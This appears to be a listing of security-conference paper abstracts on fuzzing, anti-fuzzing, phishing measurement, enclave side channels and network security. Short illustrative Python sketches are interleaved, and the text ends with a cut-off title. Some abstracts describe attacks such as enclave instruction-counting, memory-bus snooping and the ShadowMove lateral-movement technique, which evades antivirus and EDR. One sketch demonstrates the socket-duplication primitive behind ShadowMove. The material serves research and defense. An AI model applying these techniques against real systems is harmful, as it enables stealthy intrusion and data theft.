In this paper we present CloakX, the first client-side anti-fingerprinting countermeasure that works without requiring browser modification or requiring extension developers to modify their code. CloakX uses client-side diversification to prevent extension detection using anchorprints (fingerprints comprised of artifacts directly accessible to any webpage) and to reduce the accuracy of extension detection using structureprints (fingerprints built from an extension’s behavior). Despite the complexity of browser extensions, CloakX automatically incorporates client-side diversification into the extensions and maintains equivalent functionality through the use of static and dynamic program analysis. We evaluate the efficacy of CloakX on 18,937 extensions using large-scale automated analysis and in-depth manual testing. We conducted experiments to test the functionality equivalence, the detectability, and the performance of CloakX-enabled extensions. Beyond extension detection, we demonstrate that client-side modification of extensions is a viable method for the late-stage customization of browser extensions.

Less is More: Quantifying the Security Benefits of Debloating Web Applications

As software becomes increasingly complex, its attack surface expands enabling the exploitation of a wide range of vulnerabilities. Web applications are no exception since modern HTML5 standards and the ever-increasing capabilities of JavaScript are utilized to build rich web applications, often subsuming the need for traditional desktop applications. One possible way of handling this increased complexity is through the process of software debloating, i.e., the removal not only of dead code but also of code corresponding to features that a specific set of users do not require. Even though debloating has been successfully applied on operating systems, libraries, and compiled programs, its applicability on web applications has not yet been investigated.

In this paper, we present the first analysis of the security benefits of debloating web applications. We focus on four popular PHP applications and we dynamically exercise them to obtain information about the server-side code that executes as a result of client-side requests. We evaluate two different debloating strategies (file-level debloating and function-level debloating) and we show that we can produce functional web applications that are 46% smaller than their original versions and exhibit half their original cyclomatic complexity. Moreover, our results show that the process of debloating removes code associated with tens of historical vulnerabilities and further shrinks a web application’s attack surface by removing unnecessary external packages and abusable PHP gadgets.
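
The paper instruments PHP applications; as a language-neutral sketch of the same function-level idea, one can record which functions a representative workload actually exercises and treat everything else as a removal candidate. The two functions below are placeholders.

```python
import sys

def used_func(x):
    return x * 2

def dead_func(x):
    return x ** 2          # never exercised by the recorded workload

covered = set()

def tracer(frame, event, arg):
    if event == "call":
        covered.add(frame.f_code.co_name)
    return None            # no per-line tracing needed

sys.settrace(tracer)
used_func(21)              # replay the "client-side requests" workload
sys.settrace(None)

all_funcs = {"used_func", "dead_func"}
print("debloat candidates:", all_funcs - covered)   # {'dead_func'}
```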

The Web’s Identity Crisis: Understanding the Effectiveness of Website Identity Indicators

Users must understand the identity of the website that they are visiting in order to make trust decisions. Web browsers indicate website identity via URLs and HTTPS certificates, but users must understand and act on these indicators for them to be effective. In this paper, we explore how browser identity indicators affect user behavior and understanding. First, we present a large-scale field experiment measuring the effects of the HTTPS Extended Validation (EV) certificate UI on user behavior. Our experiment is many orders of magnitude larger than any prior study of EV indicators, and it is the first to examine the EV indicator in a naturalistic scenario. We find that most metrics of user behavior are unaffected by its removal, providing evidence that the EV indicator adds little value in its current form. Second, we conduct three experimental design surveys to understand how users perceive UI variations in identity indicators for login pages, looking at EV UI in Chrome and Safari and URL formatting designs in Chrome. In 14 iterations on browsers’ EV and URL formats, no intervention significantly impacted users’ understanding of the security or identity of login pages. Informed by our experimental results, we provide recommendations to build more effective website identity mechanisms.

Fuzzing

Fuzzification: Anti-Fuzzing Techniques

Fuzzing is a software testing technique that quickly and automatically explores the input space of a program without knowing its internals. Therefore, developers commonly use fuzzing as part of test integration throughout the software development process. Unfortunately, the blackbox and automatic nature of fuzzing also makes it appealing to adversaries who are looking for zero-day vulnerabilities.

To solve this problem, we propose a new mitigation approach, called Fuzzification, that helps developers protect released, binary-only software from attackers who are capable of applying state-of-the-art fuzzing techniques. Given a performance budget, this approach aims to hinder fuzzing by adversaries as much as possible. We propose three Fuzzification techniques: 1) SpeedBump, which slows fuzzed executions down by hundreds of times relative to normal executions, 2) BranchTrap, which interferes with feedback logic by hiding paths and polluting coverage maps, and 3) AntiHybrid, which hinders taint analysis and symbolic execution. Each technique is designed with best-effort, defensive measures that attempt to hinder adversaries from bypassing Fuzzification.

Our evaluation on popular fuzzers and real-world applications shows that Fuzzification effectively reduces the number of discovered paths by 70.3% and decreases the number of identified crashes by 93.0% from real-world binaries, and decreases the number of detected bugs by 67.5% from LAVA-M dataset while under user-specified overheads for common workloads. We discuss the robustness of Fuzzification techniques against adversarial analysis techniques. We open-source our Fuzzification system to foster future research.

AntiFuzz: Impeding Fuzzing Audits of Binary Executables

A general defense strategy in computer security is to increase the cost of successful attacks in both computational resources as well as human time. In the area of binary security, this is commonly done by using obfuscation methods to hinder reverse engineering and the search for software vulnerabilities. However, recent trends in automated bug finding changed the modus operandi. Nowadays it is very common for bugs to be found by various fuzzing tools. Due to ever-increasing amounts of automation and research on better fuzzing strategies, large-scale, dragnet-style fuzzing of many hundreds of targets becomes viable. As we show, current obfuscation techniques are aimed at increasing the cost of human understanding and do little to slow down fuzzing. In this paper, we introduce several techniques to protect a binary executable against an analysis with automated bug finding approaches that are based on fuzzing, symbolic/concolic execution, and taint-assisted fuzzing (commonly known as hybrid fuzzing). More specifically, we perform a systematic analysis of the fundamental assumptions of bug finding tools and develop general countermeasures for each assumption. Note that these techniques are not designed to target specific implementations of fuzzing tools, but address general assumptions that bug finding tools necessarily depend on. Our evaluation demonstrates that these techniques effectively impede fuzzing audits, while introducing a negligible performance overhead. Just as obfuscation techniques increase the amount of human labor needed to find a vulnerability, our techniques render automated fuzzing-based approaches futile.

MOPT: Optimized Mutation Scheduling for Fuzzers

Mutation-based fuzzing is one of the most popular vulnerability discovery solutions. Its performance of generating interesting test cases highly depends on the mutation scheduling strategies. However, existing fuzzers usually follow a specific distribution to select mutation operators, which is inefficient in finding vulnerabilities on general programs. Thus, in this paper, we present a novel mutation scheduling scheme MOPT, which enables mutation-based fuzzers to discover vulnerabilities more efficiently. MOPT utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness, and provides a pacemaker fuzzing mode to accelerate the convergence speed of PSO. We applied MOPT to the state-of-the-art fuzzers AFL, AFLFast and VUzzer, and implemented MOPT-AFL, -AFLFast and -VUzzer respectively, and then evaluated them on 13 real world open-source programs. The results showed that, MOPT-AFL could find 170% more security vulnerabilities and 350% more crashes than AFL. MOPT-AFLFast and MOPT-VUzzer also outperform their counterparts. Furthermore, the extensive evaluation also showed that MOPT provides a good rationality, compatibility and steadiness, while introducing negligible costs.
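
A bare-bones version of the PSO scheduling idea is shown below: each particle is a probability distribution over mutation operators, updated toward its local best and the global best. The fitness function is a made-up stand-in for "interesting test cases per operator use", and MOPT's pacemaker mode and per-operator efficiency tracking are omitted.

```python
import numpy as np

rng = np.random.default_rng(1)
N_OPS, N_PARTICLES = 6, 5                  # 6 mutation operators, 5 particles
W, C1, C2 = 0.7, 1.5, 1.5                  # inertia / cognitive / social weights

def normalize(x):
    """Project positions back onto the probability simplex (roughly)."""
    x = np.clip(x, 1e-3, None)
    return x / x.sum(axis=-1, keepdims=True)

def fitness(probs):
    """Stand-in for fuzzing yield; pretend one fixed schedule is optimal."""
    target = np.array([0.3, 0.25, 0.2, 0.1, 0.1, 0.05])
    return -np.abs(probs - target).sum(axis=-1)

pos = normalize(rng.random((N_PARTICLES, N_OPS)))
vel = np.zeros_like(pos)
lbest, lbest_f = pos.copy(), fitness(pos)
gbest = lbest[lbest_f.argmax()].copy()

for _ in range(100):
    r1, r2 = rng.random(pos.shape), rng.random(pos.shape)
    vel = W * vel + C1 * r1 * (lbest - pos) + C2 * r2 * (gbest - pos)
    pos = normalize(pos + vel)
    f = fitness(pos)
    improved = f > lbest_f
    lbest[improved], lbest_f[improved] = pos[improved], f[improved]
    gbest = lbest[lbest_f.argmax()].copy()

print(np.round(gbest, 2))   # converges toward the (made-up) optimal schedule
```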

EnFuzz: Ensemble Fuzzing with Seed Synchronization among Diverse Fuzzers

Fuzzing is widely used for vulnerability detection. There are various kinds of fuzzers with different fuzzing strategies, and most of them perform well on their targets. However, in industrial practice, it is found that the performance of those well-designed fuzzing strategies is challenged by the complexity and diversity of real-world applications. In this paper, we systematically study an ensemble fuzzing approach. First, we define the diversity of base fuzzers in three heuristics: diversity of coverage information granularity, diversity of input generation strategy and diversity of seed selection and mutation strategy. Based on those heuristics, we choose several of the most recent base fuzzers that are as diverse as possible, and propose a globally asynchronous and locally synchronous (GALS) based seed synchronization mechanism to seamlessly ensemble those base fuzzers and obtain better performance. For evaluation, we implement EnFuzz based on several widely used fuzzers such as QSYM and FairFuzz, and then we test them on LAVA-M and Google’s fuzzing-test-suite, which consists of 24 widely used real-world applications. This experiment indicates that, under the same constraints for resources, these base fuzzers perform differently on different applications, while EnFuzz always outperforms other fuzzers in terms of path coverage, branch coverage and bug discovery. Furthermore, EnFuzz found 60 new vulnerabilities in several well-fuzzed projects such as libpng and libjpeg, and 44 new CVEs were assigned.

GRIMOIRE: Synthesizing Structure while Fuzzing

In the past few years, fuzzing has received significant attention from the research community. However, most of this attention was directed towards programs without a dedicated parsing stage. In such cases, fuzzers which leverage the input structure of a program can achieve significantly higher code coverage compared to traditional fuzzing approaches. This advancement in coverage is achieved by applying large-scale mutations in the application’s input space. However, this improvement comes at the cost of requiring expert domain knowledge, as these fuzzers depend on structured input specifications (e.g., grammars). Grammar inference, a technique which can automatically generate such grammars for a given program, can be used to address this shortcoming. Such techniques usually infer a program’s grammar in a pre-processing step and can miss important structures that are uncovered only later during normal fuzzing.

In this paper, we present the design and implementation of GRIMOIRE, a fully automated coverage-guided fuzzer which works without any form of human interaction or pre-configuration; yet, it is still able to efficiently test programs that expect highly structured inputs. We achieve this by performing large-scale mutations in the program input space using grammar-like combinations to synthesize new highly structured inputs without any pre-processing step. Our evaluation shows that GRIMOIRE outperforms other coverage-guided fuzzers when fuzzing programs with highly structured inputs. Furthermore, it improves upon existing grammar-based coverage-guided fuzzers. Using GRIMOIRE, we identified 19 distinct memory corruption bugs in real-world programs and obtained 11 new CVEs.
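
GRIMOIRE's generalization step can be approximated in a few lines: repeatedly try deleting chunks of an input, keep deletions that preserve the interesting coverage, and remember where the gaps are so that fragments can later be spliced there. The coverage oracle below is a toy; the real fuzzer consults a coverage bitmap.

```python
def keeps_coverage(data):
    """Toy oracle for 'does this input still hit the interesting code?'"""
    return b"<a>" in data and b"</a>" in data

def generalize(data, chunk=2):
    """Drop removable chunks; record a gap (None) wherever one was dropped."""
    out, i = [], 0
    while i < len(data):
        candidate = data[:i] + data[i + chunk:]
        if keeps_coverage(candidate):
            data = candidate            # chunk was irrelevant: delete it
            out.append(None)            # and remember a splice point here
        else:
            out.append(data[i:i + chunk])
            i += chunk
    return out

print(generalize(b"xx<a>hello</a>yy"))
# [None, b'<a', b'>h', None, None, b'</', b'a>', None]
# The tag structure survives; the filler turns into gaps where other
# generalized fragments can later be spliced in.
```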

2020 Technical Sessions dblp

Human Factors

A Comprehensive Quality Evaluation of Security and Privacy Advice on the Web

End users learn defensive security behaviors from a variety of channels, including a plethora of security advice given in online articles. A great deal of effort is devoted to getting users to follow this advice. Surprisingly then, little is known about the quality of this advice: Is it comprehensible? Is it actionable? Is it effective? To answer these questions, we first conduct a large-scale, user-driven measurement study to identify 374 unique recommended behaviors contained within 1,264 documents of online security and privacy advice. Second, we develop and validate measurement approaches for evaluating the quality – comprehensibility, perceived actionability, and perceived efficacy – of security advice. Third, we deploy these measurement approaches to evaluate the 374 unique pieces of security advice in a user-study with 1,586 users and 41 professional security experts. Our results suggest a crisis of advice prioritization. The majority of advice is perceived by most users to be at least somewhat actionable and somewhat comprehensible. Yet, both users and experts struggle to prioritize this advice. For example, experts perceive 89% of the hundreds of studied behaviors as being effective, and identify 118 of them as being among the “top 5” things users should do, leaving end-users on their own to prioritize and take action to protect themselves.

Understanding security mistakes developers make: Qualitative analysis from Build It, Break It, Fix It

Secure software development is a challenging task requiring consideration of many possible threats and mitigations. This paper investigates how and why programmers, despite a baseline of security experience, make security-relevant errors. To do this, we conducted an in-depth analysis of 94 submissions to a secure-programming contest designed to mimic real-world constraints: correctness, performance, and security. In addition to writing secure code, participants were asked to search for vulnerabilities in other teams’ programs; in total, teams submitted 866 exploits against the submissions we considered. Over an intensive six-month period, we used iterative open coding to manually, but systematically, characterize each submitted project and vulnerability (including vulnerabilities we identified ourselves). We labeled vulnerabilities by type, attacker control allowed, and ease of exploitation, and projects according to security implementation strategy. Several patterns emerged. For example, simple mistakes were least common: only 21% of projects introduced such an error. Conversely, vulnerabilities arising from a misunderstanding of security concepts were significantly more common, appearing in 78% of projects. Our results have implications for improving secure-programming APIs, API documentation, vulnerability-finding tools, and security education.

Empirical Measurement of Systemic 2FA Usability

Two-Factor Authentication (2FA) hardens an organization against user account compromise, but adds an extra step to organizations’ mission-critical tasks. We investigate to what extent quantitative analysis of operational logs of 2FA systems both supports and challenges recent results from user studies and surveys identifying usability challenges in 2FA systems. Using tens of millions of logs and records kept at two public universities, we quantify the at-scale impact on organizations and their employees during a mandatory 2FA implementation. We show the multiplicative effects of device remembrance, fragmented login services, and authentication timeouts on user burden. We find that user burden does not deviate far from other compliance and risk management time requirements already common to large organizations. We investigate the cause of more than one in twenty 2FA ceremonies being aborted or failing, and the variance in user experience across users. We hope our analysis will empower more organizations to protect themselves with 2FA.

What Twitter Knows: Characterizing Ad Targeting Practices, User Perceptions, and Ad Explanations Through Users’ Own Twitter Data

Although targeted advertising has drawn significant attention from privacy researchers, many critical empirical questions remain. In particular, only a few of the dozens of targeting mechanisms used by major advertising platforms are well understood, and studies examining users’ perceptions of ad targeting often rely on hypothetical situations. Further, it is unclear how well existing transparency mechanisms, from data-access rights to ad explanations, actually serve the users they are intended for. To develop a deeper understanding of the current targeted advertising ecosystem, this paper uses 231 participants’ own Twitter data, containing ads they were shown and the associated targeting criteria, for a measurement and user study. We find many targeting mechanisms ignored by prior work — including advertiser-uploaded lists of specific users, lookalike audiences, and retargeting campaigns — are widely used on Twitter. Crucially, participants found these understudied practices among the most privacy invasive. Participants also found ad explanations designed for this study more useful, more comprehensible, and overall preferable than Twitter’s current ad explanations. Our findings underscore the benefits of data access, characterize unstudied facets of targeted advertising, and identify potential directions for improving transparency in targeted advertising.

The Impact of Ad-Blockers on Product Search and Purchase Behavior: A Lab Experiment

Ad-blocking applications have become increasingly popular among Internet users. Ad-blockers offer various privacy- and security-enhancing features: they can reduce personal data collection and exposure to malicious advertising, help safeguard users’ decision-making autonomy, reduce users’ costs (by increasing the speed of page loading), and improve the browsing experience (by reducing visual clutter). On the other hand, the online advertising industry has claimed that ads increase consumers’ economic welfare by helping them find better, cheaper deals faster. If so, using ad-blockers would deprive consumers of these benefits. However, little is known about the actual economic impact of ad-blockers.

We designed a lab experiment (N=212) with real economic incentives to understand the impact of ad-blockers on consumers’ product searching and purchasing behavior, and the resulting consumer outcomes. We focus on the effects of blocking contextual ads (ads targeted to individual, potentially sensitive, contexts, such as search queries in a search engine or the content of web pages) on how participants searched for and purchased various products online, and the resulting consumer welfare.

We find that blocking contextual ads did not have a statistically significant effect on the prices of products participants chose to purchase, the time they spent searching for them, or how satisfied they were with the chosen products, prices, and perceived quality. Hence we do not reject the null hypothesis that consumer behavior and outcomes stay constant whether such ads are blocked or shown. We conclude that the use of ad-blockers does not seem to compromise consumer economic welfare (along the metrics captured in the experiment) in exchange for privacy and security benefits. We discuss the implications of this work in terms of end-users’ privacy, the study’s limitations, and future work to extend these results.

Phishing, Spam, and Threat Intelligence

Sunrise to Sunset: Analyzing the End-to-end Life Cycle and Effectiveness of Phishing Attacks at Scale

Despite an extensive anti-phishing ecosystem, phishing attacks continue to capitalize on gaps in detection to reach a significant volume of daily victims. In this paper, we isolate and identify these detection gaps by measuring the end-to-end life cycle of large-scale phishing attacks. We develop a unique framework—Golden Hour—that allows us to passively measure victim traffic to phishing pages while proactively protecting tens of thousands of accounts in the process. Over a one year period, our network monitor recorded 4.8 million victims who visited phishing pages, excluding crawler traffic. We use these events and related data sources to dissect phishing campaigns: from the time they first come online, to email distribution, to visitor traffic, to ecosystem detection, and finally to account compromise. We find that the average campaign, from its start to its last victim, lasts just 21 hours. At least 7.42% of visitors supply their credentials and ultimately experience a compromise and subsequent fraudulent transaction. Furthermore, a small collection of highly successful campaigns are responsible for 89.13% of victims. Based on our findings, we outline potential opportunities to respond to these sophisticated attacks.

PhishTime: Continuous Longitudinal Measurement of the Effectiveness of Anti-phishing Blacklists

Due to their ubiquity in modern web browsers, anti-phishing blacklists are a key defense against large-scale phishing attacks. However, sophistication in phishing websites—such as evasion techniques that seek to defeat these blacklists—continues to grow. Yet, the effectiveness of blacklists against evasive websites is difficult to measure, and there have been no methodical efforts to make and track such measurements, at the ecosystem level, over time.

We propose a framework for continuously identifying unmitigated phishing websites in the wild, replicating key aspects of their configuration in a controlled setting, and generating longitudinal experiments to measure the ecosystem’s protection. In six experiment deployments over nine months, we systematically launch and report 2,862 new (innocuous) phishing websites to evaluate the performance (speed and coverage) and consistency of blacklists, with the goal of improving them.

We show that methodical long-term empirical measurements are an effective strategy for proactively detecting weaknesses in the anti-phishing ecosystem. Through our experiments, we identify and disclose several such weaknesses, including a class of behavior-based JavaScript evasion that blacklists were unable to detect. We find that enhanced protections on mobile devices and the expansion of evidence-based reporting protocols are critical ecosystem improvements that could better protect users against modern phishing attacks, which routinely seek to evade detection infrastructure.

Who’s Calling? Characterizing Robocalls through Audio and Metadata Analysis

Unsolicited calls are one of the most prominent security issues facing individuals today. Despite widespread anecdotal discussion of the problem, many important questions remain unanswered. In this paper, we present the first large-scale, longitudinal analysis of unsolicited calls to a honeypot of up to 66,606 lines over 11 months. From call metadata we characterize the long-term trends of unsolicited calls, develop the first techniques to measure voicemail spam and wangiri attacks, and identify unexplained high-volume call incidents. Additionally, we mechanically answer a subset of the call attempts we receive to cluster related calls into operational campaigns, allowing us to characterize how these campaigns use telephone numbers. Critically, we find no evidence that answering unsolicited calls increases the amount of unsolicited calls received, overturning popular wisdom. We also find that we can reliably isolate individual call campaigns, in the process revealing the extent of two distinct Social Security scams while empirically demonstrating the majority of campaigns rarely reuse phone numbers. These analyses comprise powerful new tools and perspectives for researchers, investigators, and a beleaguered public.

See No Evil: Phishing for Permissions with False Transparency

Android introduced runtime permissions in order to provide users with more contextual information to make informed decisions as well as with finer granularity when dealing with permissions. In this work, we identified that the correct operation of the runtime permission model relies on certain implicit assumptions which can conveniently be broken by adversaries to illegitimately obtain permissions from the background while impersonating foreground apps. We call this detrimental scenario false transparency attacks. These attacks constitute a serious security threat to the Android platform as they invalidate the security guarantees of 1) runtime permissions by enabling background apps to spoof the context and identity of foreground apps when requesting permissions and of 2) Android permissions altogether by allowing adversaries to exploit users’ trust in other apps to obtain permissions.

We demonstrated via a user study we conducted on Amazon Mechanical Turk that mobile users’ comprehension of runtime permissions renders them susceptible to this attack vector. We carefully designed our attacks to launch strategically in order to appear persuasive and verified the validity of our design strategies through our user study. To demonstrate the feasibility of our attacks, we conducted an in-lab user study in a realistic setting and showed that none of the subjects noticed our attacks. Finally, we discuss why the existing defenses against mobile phishing fail in the context of false transparency attacks. In particular, we disclose the security vulnerabilities we identified in a key security mechanism added in Android 10. We then propose a list of countermeasures to be implemented on the Android platform and on app stores to practically tackle false transparency attacks.

A different cup of TI? The added value of commercial threat intelligence

Commercial threat intelligence is thought to provide unmatched coverage on attacker behavior, but it is out of reach for many organizations due to its hefty price tag. This paper presents the first empirical assessment of the services of commercial threat intelligence providers. For two leading vendors, we describe what these services consist of and compare their indicators with each other. There is almost no overlap between them, nor with four large open threat intelligence feeds. Even for 22 specific threat actors – which both vendors claim to track – we find an average overlap of only 2.5% to 4.0% between the indicator feeds. The few indicators that do overlap appear in the other vendor’s feed with an average delay of a month. These findings raise questions on the coverage and timeliness of paid threat intelligence.

We also conducted 14 interviews with security professionals who use paid threat intelligence. We find that value in this market is understood differently than prior work on quality metrics has assumed. Poor coverage and small volume appear to be less of a problem to customers. They seem to be optimizing for the workflow of their scarce resource – analyst time – rather than for the detection of threats. Respondents evaluate TI mostly through informal processes and heuristics, rather than the quantitative metrics that research has proposed.
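
To make the paper’s feed comparison concrete, here is a minimal sketch of the overlap metric: treat each feed as a set of indicators with first-seen dates, intersect them, and measure how late the shared indicators appear. The feed contents below are made up for illustration.

```python
# Toy version of the vendors' feed comparison: indicator overlap between two
# feeds, and the lag with which shared indicators appear. Contents are made up.
from datetime import date

feed_a = {"1.2.3.4": date(2020, 1, 10), "evil.example": date(2020, 1, 12)}
feed_b = {"1.2.3.4": date(2020, 2, 9), "bad.example": date(2020, 1, 20)}

shared = feed_a.keys() & feed_b.keys()
overlap_pct = 100 * len(shared) / len(feed_a)          # overlap relative to feed A
lags = [(feed_b[i] - feed_a[i]).days for i in shared]  # positive: B lags behind A

print(f"overlap: {overlap_pct:.1f}%, mean lag: {sum(lags) / len(lags):.0f} days")
```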

Trusted Execution Environments 1

HybCache: Hybrid Side-Channel-Resilient Caches for Trusted Execution Environments

Modern multi-core processors share cache resources for maximum cache utilization and performance gains. However, this leaves the cache vulnerable to side-channel attacks, where inherent timing differences in shared cache behavior are exploited to infer information on the victim’s execution patterns, ultimately leaking private information such as a secret key. The root cause for these attacks is mutually distrusting processes sharing the cache entries and accessing them in a deterministic and consistent manner. Various defenses against cache side-channel attacks have been proposed. However, they suffer from serious shortcomings: they either degrade performance significantly, impose impractical restrictions, or can only defeat certain classes of these attacks. More importantly, they assume that side-channel-resilient caches are required for the entire execution workload and do not allow the possibility to selectively enable the mitigation only for the security-critical portion of the workload.

We present a generic mechanism for a flexible and soft partitioning of set-associative caches and propose a hybrid cache architecture, called HybCache. HybCache can be configured to selectively apply side-channel-resilient cache behavior only for isolated execution domains, while providing the non-isolated execution with conventional cache behavior, capacity and performance. An isolation domain can include one or more processes, specific portions of code, or a Trusted Execution Environment (e.g., SGX or TrustZone). We show that, with minimal hardware modifications and kernel support, HybCache can provide side-channel-resilient caching only for isolated execution with a performance overhead of 3.5–5%, while incurring no performance overhead for the remaining execution workload. We provide a simulator-based and hardware implementation of HybCache to evaluate the performance and area overheads, and show how HybCache mitigates typical access-based and contention-based cache attacks.

CopyCat: Controlled Instruction-Level Attacks on Enclaves

The adversarial model presented by trusted execution environments (TEEs) has prompted researchers to investigate unusual attack vectors. One particularly powerful class of controlled-channel attacks abuses page-table modifications to reliably track enclave memory accesses at a page-level granularity. In contrast to noisy microarchitectural timing leakage, this line of deterministic controlled-channel attacks abuses indispensable architectural interfaces and hence cannot be mitigated by tweaking microarchitectural resources.

We propose an innovative controlled-channel attack, named CopyCat, that deterministically counts the number of instructions executed within a single enclave code page. We show that combining the instruction counts harvested by CopyCat with traditional, coarse-grained page-level leakage allows the accurate reconstruction of enclave control flow at a maximal instruction-level granularity. CopyCat can identify intra-page and intra-cache line branch decisions that ultimately may only differ in a single instruction, underscoring that even extremely subtle control flow deviations can be deterministically leaked from secure enclaves. We demonstrate the improved resolution and practicality of CopyCat on Intel SGX in an extensive study of single-trace and deterministic attacks against cryptographic implementations, and give novel algorithmic attacks to perform single-trace key extraction that exploit subtle vulnerabilities in the latest versions of widely-used cryptographic libraries. Our findings highlight the importance of stricter verification of cryptographic implementations, especially in the context of TEEs.

An Off-Chip Attack on Hardware Enclaves via the Memory Bus

This paper shows how an attacker can break the confidentiality of a hardware enclave with Membuster, an off-chip attack based on snooping the memory bus. An attacker with physical access can observe an unencrypted address bus and extract fine-grained memory access patterns of the victim. Membuster is qualitatively different from prior on-chip attacks on enclaves and is more difficult to thwart.

We highlight several challenges for Membuster. First, DRAM requests are only visible on the memory bus at last-level cache misses. Second, the attack needs to incur minimal interference or overhead to the victim to prevent the detection of the attack. Lastly, the attacker needs to reverse-engineer the translation between virtual, physical, and DRAM addresses to perform a robust attack. We introduce three techniques (critical page whitelisting, cache squeezing, and an oracle-based fuzzy matching algorithm) to increase cache misses for memory accesses that are useful for the attack, with no detectable interference to the victim, and to translate the observed accesses into sensitive data. We demonstrate Membuster on an Intel SGX CPU to leak confidential data from two applications: Hunspell and Memcached. We show that a single uninterrupted run of the victim can leak most of the sensitive data with high accuracy.

Civet: An Efficient Java Partitioning Framework for Hardware Enclaves

Hardware enclaves are designed to execute small pieces of sensitive code or to operate on sensitive data, in isolation from larger, less trusted systems. Partitioning a large, legacy application requires significant effort. Partitioning an application written in a managed language, such as Java, is more challenging because of mutable language characteristics, extensive code reachability in class libraries, and the inevitability of using a heavyweight runtime.

Civet is a framework for partitioning Java applications into enclaves. Civet reduces the number of lines of code in the enclave and uses language-level defenses, including deep type checks and dynamic taint-tracking, to harden the enclave interface. Civet also contributes a partitioned Java runtime design, including a garbage collection design optimized for the peculiarities of enclaves. Civet is efficient for data-intensive workloads; partitioning a Hadoop mapper reduces the enclave overhead from 10× to 16–22% without taint-tracking or 70–80% with taint-tracking.

BesFS: A POSIX Filesystem for Enclaves with a Mechanized Safety Proof

New trusted computing primitives such as Intel SGX have shown the feasibility of running user-level applications in enclaves on a commodity trusted processor without trusting a large OS. However, the OS can still compromise the integrity of an enclave by tampering with the system call return values. In fact, it has been shown that a subclass of these attacks, called Iago attacks, enables arbitrary logic execution in enclave programs. Existing enclave systems have a very large TCB and implement ad-hoc checks at the system call interface that are hard to verify for completeness. To this end, we present BesFS—the first filesystem interface which provably protects the enclave integrity against a completely malicious OS. We prove 167 lemmas and 2 key theorems in 4625 lines of Coq proof scripts, which directly proves the safety properties of the BesFS specification. BesFS comprises 15 APIs with compositional safety and is expressive enough to support 31 real applications we test. BesFS integrates into existing SGX-enabled applications with minimal impact to TCB. BesFS can serve as a reference implementation for hand-coded API checks.
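
For flavor, a tiny sketch of the kind of interface check BesFS makes rigorous: the enclave must validate every system-call result from the untrusted OS against a specification before trusting it. The classic Iago example is trusting read() to return no more than the requested number of bytes. This is a two-line illustration, not BesFS’s verified specification.

```python
# An Iago-style check in miniature: never trust the OS's read() result blindly.
def checked_read(os_read, fd, n):
    data = os_read(fd, n)
    if len(data) > n:                 # a malicious OS could overflow the caller's buffer
        raise RuntimeError("Iago attack: OS returned more bytes than requested")
    return data

evil_os_read = lambda fd, n: b"A" * (n + 1)   # hypothetical malicious OS interface
try:
    checked_read(evil_os_read, 3, 16)
except RuntimeError as e:
    print(e)
```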

Network Security

EPIC: Every Packet Is Checked in the Data Plane of a Path-Aware Internet

An exciting insight of recent networking research has been that path-aware networking architectures are able to fundamentally solve many of the security issues of today’s Internet, while increasing overall efficiency and giving control over path selection to end hosts. In this paper, we consider three important issues related to this new networking paradigm: First, network operators still need to be able to impose their own policies to rule out uneconomical paths and to enforce these decisions on the data plane. Second, end hosts should be able to verify that their forwarding decisions are actually followed by the network. Finally, both intermediate routers and recipients should be able to authenticate the source of packets. These properties have been considered by previous work, but there is no existing system that achieves both strong security guarantees and high efficiency.

We propose EPIC, a family of data-plane protocols that provide increasingly strong security properties, addressing all three described requirements. The EPIC protocols have significantly lower communication overhead than comparable systems: for realistic path lengths, the overhead is 3–5 times smaller compared to the state-of-the-art systems OPT and ICING. Our prototype implementation is able to saturate a 40 Gbps link even on commodity hardware due to the use of only a few highly efficient symmetric cryptographic operations in the forwarding process. Thus, by ensuring that every packet is checked at every hop, we make an important step towards an efficient and secure future Internet.
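
A greatly simplified sketch of the per-hop checking idea, assuming one symmetric key shared between the sender and each on-path router: the sender precomputes a short hop validation field (HVF) per router, and each hop recomputes and verifies its own field before forwarding. The real EPIC protocols differ in key derivation, field layout, and replay protection.

```python
# Toy per-hop packet authentication with truncated symmetric MACs.
import hashlib, hmac, os

hop_keys = [os.urandom(16) for _ in range(4)]   # one key per AS on the path
packet = b"path-7|payload"

def hvf(key, pkt):                              # short per-hop validation field
    return hmac.new(key, pkt, hashlib.sha256).digest()[:4]

fields = [hvf(k, packet) for k in hop_keys]     # sender precomputes all HVFs

for i, key in enumerate(hop_keys):              # each router checks its field, else drops
    assert hmac.compare_digest(fields[i], hvf(key, packet)), f"hop {i} drops packet"
print("every packet is checked at every hop")
```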

ShadowMove: A Stealthy Lateral Movement Strategy

Advanced Persistent Threat (APT) attacks use various strategies and techniques to move laterally within an enterprise environment; however, the existing strategies and techniques have limitations such as requiring elevated permissions, creating new connections, performing new authentications, or requiring process injections. Based on these characteristics, many host and network-based solutions have been proposed to prevent or detect such lateral movement attempts. In this paper, we present a novel stealthy lateral movement strategy, ShadowMove, in which only established connections between systems in an enterprise network are misused for lateral movements. It has a set of unique features such as requiring no elevated privilege, no new connection, no extra authentication, and no process injection, which makes it stealthy against state-of-the-art detection mechanisms. ShadowMove is enabled by a novel socket duplication approach that allows a malicious process to silently abuse TCP connections established by benign processes. We design and implement ShadowMove for current Windows and Linux operating systems. To validate the feasibility of ShadowMove, we build several prototypes that successfully hijack three kinds of enterprise protocols, FTP, Microsoft SQL, and Windows Remote Management, to perform lateral movement actions such as copying malware to the next target machine and launching malware on the target machine. We also confirm that our prototypes cannot be detected by existing host and network-based solutions, such as five top-notch anti-virus products (McAfee, Norton, Webroot, Bitdefender, and Windows Defender), four IDSes (Snort, OSSEC, Osquery, and Wazuh), and two Endpoint Detection and Response systems (CrowdStrike Falcon Prevent and Cisco AMP).
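
The enabling primitive, in miniature: handing an established TCP socket to a second process. On Linux this reduces to passing the file descriptor over a Unix socket via SCM_RIGHTS, which Python 3.9+ exposes as socket.send_fds/recv_fds. ShadowMove additionally locates and duplicates sockets owned by a separate benign process; the sketch below only shows the duplication step between cooperating processes, and needs Linux plus network access to run.

```python
# FD-passing sketch: an established TCP socket is duplicated into another process.
import os, socket

parent_end, child_end = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)

if os.fork() == 0:                                    # the receiving process
    _, fds, _, _ = socket.recv_fds(child_end, 1024, 1)
    dup = socket.socket(fileno=fds[0])                # adopt the duplicated socket
    print("child now owns a connection to", dup.getpeername())
    os._exit(0)

tcp = socket.create_connection(("example.com", 80))   # the "benign" connection
socket.send_fds(parent_end, [b"fd"], [tcp.fileno()])  # SCM_RIGHTS under the hood
os.wait()
```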

Poison Over Troubled Forwarders: A Cache Poisoning Attack Targeting DNS Forwarding Devices

